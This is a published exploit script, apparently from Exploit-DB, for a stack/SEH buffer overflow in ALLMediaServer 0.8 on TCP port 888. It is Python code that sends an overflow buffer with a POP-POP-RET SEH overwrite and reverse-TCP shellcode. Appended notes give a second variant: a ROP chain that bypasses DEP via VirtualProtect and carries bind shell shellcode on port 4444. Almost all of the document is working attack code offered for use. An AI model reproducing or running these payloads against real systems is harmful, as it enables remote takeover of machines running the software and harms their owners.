ALLMediaServer 0.8 SEH Overflow Exploit



# Exploit Title: seh exploit, BOF 

# Date: 04/07/2012
# Exploit Author: motaz reda 
# my E-mail:  motazkhodair@gmail.com
# Software Link: http://allmediaserver.org/
# Version: ALLMediaServer 0.8
# Tested On: Windows 7 ultimate
################################################

#!/usr/bin/python

import sys, socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((sys.argv[1], 888))

buffer = "A" * 1072

buffer += "\xeb\x06\x90\x90"   #NSEH  jmp short 6

buffer += "\xca\x24\xec\x65"   # SEH  POP POP RETN

# msfpayload windows/shell_reverse_tcp 
# you can replace the shellcode with any shellcode u want

buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1"
"\x4f\x83\xeb\xfc\x31\x43\x15\x03\x43\x15\x44\x5f\x4a\x45\x01"
"\xa0\xb3\x96\x71\x28\x56\xa7\xa3\x4e\x12\x9a\x73\x04\x76\x17"
"\xf8\x48\x63\xac\x8c\x44\x84\x05\x3a\xb3\xab\x96\x8b\x7b\x67"
"\x54\x8a\x07\x7a\x89\x6c\x39\xb5\xdc\x6d\x7e\xa8\x2f\x3f\xd7"
"\xa6\x82\xaf\x5c\xfa\x1e\xce\xb2\x70\x1e\xa8\xb7\x47\xeb\x02"
"\xb9\x97\x44\x19\xf1\x0f\xee\x45\x22\x31\x23\x96\x1e\x78\x48"
"\x6c\xd4\x7b\x98\xbd\x15\x4a\xe4\x11\x28\x62\xe9\x68\x6c\x45"
"\x12\x1f\x86\xb5\xaf\x27\x5d\xc7\x6b\xa2\x40\x6f\xff\x14\xa1"
"\x91\x2c\xc2\x22\x9d\x99\x81\x6d\x82\x1c\x46\x06\xbe\x95\x69"
"\xc9\x36\xed\x4d\xcd\x13\xb5\xec\x54\xfe\x18\x11\x86\xa6\xc5"
"\xb7\xcc\x45\x11\xc1\x8e\x01\xd6\xff\x30\xd2\x70\x88\x43\xe0"
"\xdf\x22\xcc\x48\x97\xec\x0b\xae\x82\x48\x83\x51\x2d\xa8\x8d"
"\x95\x79\xf8\xa5\x3c\x02\x93\x35\xc0\xd7\x33\x66\x6e\x88\xf3"
"\xd6\xce\x78\x9b\x3c\xc1\xa7\xbb\x3e\x0b\xde\xfc\xa9\x74\x49"
"\x03\x3e\x1d\x88\x03\x2f\x81\x05\xe5\x25\x29\x40\xbe\xd1\xd0"
"\xc9\x34\x43\x1c\xc4\xdc\xe0\x8f\x83\x1c\x6e\xac\x1b\x4b\x27"
"\x02\x52\x19\xd5\x3d\xcc\x3f\x24\xdb\x37\xfb\xf3\x18\xb9\x02"
"\x71\x24\x9d\x14\x4f\xa5\x99\x40\x1f\xf0\x77\x3e\xd9\xaa\x39"
"\xe8\xb3\x01\x90\x7c\x45\x6a\x23\xfa\x4a\xa7\xd5\xe2\xfb\x1e"
"\xa0\x1d\x33\xf7\x24\x66\x29\x67\xca\xbd\xe9\x97\x81\x9f\x58"
"\x30\x4c\x4a\xd9\x5d\x6f\xa1\x1e\x58\xec\x43\xdf\x9f\xec\x26"
"\xda\xe4\xaa\xdb\x96\x75\x5f\xdb\x05\x75\x4a")

s.send(buffer)

s.close()

### Exploit-DB note:
### This affects AllMediaSErver 0.94 as well.

# Exploit-DB Note:
# Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn
# DEP/ASLR bypass with bind shell on port 4444
buffer = "\x41" * 984
buffer+= "\xe6\x30\x46\x00"    # Second ADD esp for stack adjustment
                # add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe
buffer+= "\x41" * 88
# Step over SEH
stackAdjust = "\x9e\x6c\x42\x00"    # add esp,800 | pop ebx | retn ~ MediaServer.exe
                    # Returns to Second ADD ESP
stackAdjust+= "\x42\x42\x42\x42" * 15    # Padding

# VirtualProtect into ESI
rop = "\x26\xfa\xf6\x65"    # pop eax | retn             ~ avcodec-53.dll
rop+= "\xe0\xe4\x1e\x67"    # &kernel32.VirtualProtect        ~
rop+= "\x54\xcd\xc6\x6a"    # mov eax,dword ptr ds:[eax] | retn    ~
rop+= "\x04\xef\x2e\x66"    # xchg eax,esi | retn            ~ avcodec-53.dll
                # Puts Kernel31.VirtualProtect
# lpAddress param into EBP
rop+= "\xb3\x14\xb8\x68"        # pop ebp | retn                           ~
rop+= "\x07\x5d\x0c\x66"    # ROP jmp esp | ???            ~ avcodec-53.dll

# dwSize into EBX
rop+= "\x26\xfa\xf6\x65"        # pop eax | retn                        ~ avcodec-53.dll
rop+= "\xff\xfd\xff\xff"    # Will negate to 0x201
rop+= "\xbe\x13\x6e\x66"        # neg eax | retn
rop+= "\x2b\xe2\xf4\x65"    # xchg eax,ebx | retn            ~ avcodec-53.dll

# flNewProtect 0x40 into EDX
rop+= "\x26\xfa\xf6\x65"        # pop eax | retn                           ~ avcodec-53.dll
rop+= "\xc0\xff\xff\xff"    # Will negate to 0x40
rop+= "\xbe\x13\x6e\x66"        # neg eax | retn                        ~ avcodec-53.dll
rop+= "\x46\x08\x53\x66"    # xchg eax,edx | retn            ~ avcoded-53.dll

# lpflOldProtect into ECX
rop+= "\x26\xfa\xf6\x65"        # pop eax | retn                           ~ avcodec-53.dll
rop+= "\x69\xef\x5f\x00"    # writeable address            ~ avformat-53.dll
rop+= "\xeb\x9b\x74\x66"    # xchg eax,ecx | retn            ~ avcodec-53.dll

# RETN into EDI
rop+= "\x84\xe6\x75\x66"    # pop edi | retn
rop+= "\x6d\x9b\xb2\x6a"    # retn ROP

# Nops in EAX
rop+= "\x26\xfa\xf6\x65"        # pop eax | retn                           ~ avcodec-53.dll
rop+= "\x90\x90\x90\x90"

# PushAD
rop+= "\x3a\x18\x75\x66"    # pushad | rent                ~ avodec-53.dll

rop+= "\x90\x90\x90\x90"


shellcode =(
"\xba\x4b\xdb\xfb\xca\xdb\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x56\x31\x55\x13\x03\x55\x13\x83\xed\xb7\x39\x0e\x36"
"\xaf\x37\xf1\xc7\x2f\x28\x7b\x22\x1e\x7a\x1f\x26\x32\x4a"
"\x6b\x6a\xbe\x21\x39\x9f\x35\x47\x96\x90\xfe\xe2\xc0\x9f"
"\xff\xc2\xcc\x4c\xc3\x45\xb1\x8e\x17\xa6\x88\x40\x6a\xa7"
"\xcd\xbd\x84\xf5\x86\xca\x36\xea\xa3\x8f\x8a\x0b\x64\x84"
"\xb2\x73\x01\x5b\x46\xce\x08\x8c\xf6\x45\x42\x34\x7d\x01"
"\x73\x45\x52\x51\x4f\x0c\xdf\xa2\x3b\x8f\x09\xfb\xc4\xa1"
"\x75\x50\xfb\x0d\x78\xa8\x3b\xa9\x62\xdf\x37\xc9\x1f\xd8"
"\x83\xb3\xfb\x6d\x16\x13\x88\xd6\xf2\xa5\x5d\x80\x71\xa9"
"\x2a\xc6\xde\xae\xad\x0b\x55\xca\x26\xaa\xba\x5a\x7c\x89"
"\x1e\x06\x27\xb0\x07\xe2\x86\xcd\x58\x4a\x77\x68\x12\x79"
"\x6c\x0a\x79\x16\x41\x21\x82\xe6\xcd\x32\xf1\xd4\x52\xe9"
"\x9d\x54\x1b\x37\x59\x9a\x36\x8f\xf5\x65\xb8\xf0\xdc\xa1"
"\xec\xa0\x76\x03\x8c\x2a\x87\xac\x59\xfc\xd7\x02\x31\xbd"
"\x87\xe2\xe1\x55\xc2\xec\xde\x46\xed\x26\x69\x41\x23\x12"
"\x3a\x26\x46\xa4\xad\xea\xcf\x42\xa7\x02\x86\xdd\x5f\xe1"
"\xfd\xd5\xf8\x1a\xd4\x49\x51\x8d\x60\x84\x65\xb2\x70\x82"
"\xc6\x1f\xd8\x45\x9c\x73\xdd\x74\xa3\x59\x75\xfe\x9c\x0a"
"\x0f\x6e\x6f\xaa\x10\xbb\x07\x4f\x82\x20\xd7\x06\xbf\xfe"
"\x80\x4f\x71\xf7\x44\x62\x28\xa1\x7a\x7f\xac\x8a\x3e\xa4"
"\x0d\x14\xbf\x29\x29\x32\xaf\xf7\xb2\x7e\x9b\xa7\xe4\x28"
"\x75\x0e\x5f\x9b\x2f\xd8\x0c\x75\xa7\x9d\x7e\x46\xb1\xa1"
"\xaa\x30\x5d\x13\x03\x05\x62\x9c\xc3\x81\x1b\xc0\x73\x6d"
"\xf6\x40\x83\x24\x5a\xe0\x0c\xe1\x0f\xb0\x50\x12\xfa\xf7"
"\x6c\x91\x0e\x88\x8a\x89\x7b\x8d\xd7\x0d\x90\xff\x48\xf8"
"\x96\xac\x69\x29")

payload = buffer + stackAdjust + rop + shellcode
rest = 1765 - len(payload)
exploit = payload + "\xCC" * rest
# Send exploit to target's port 888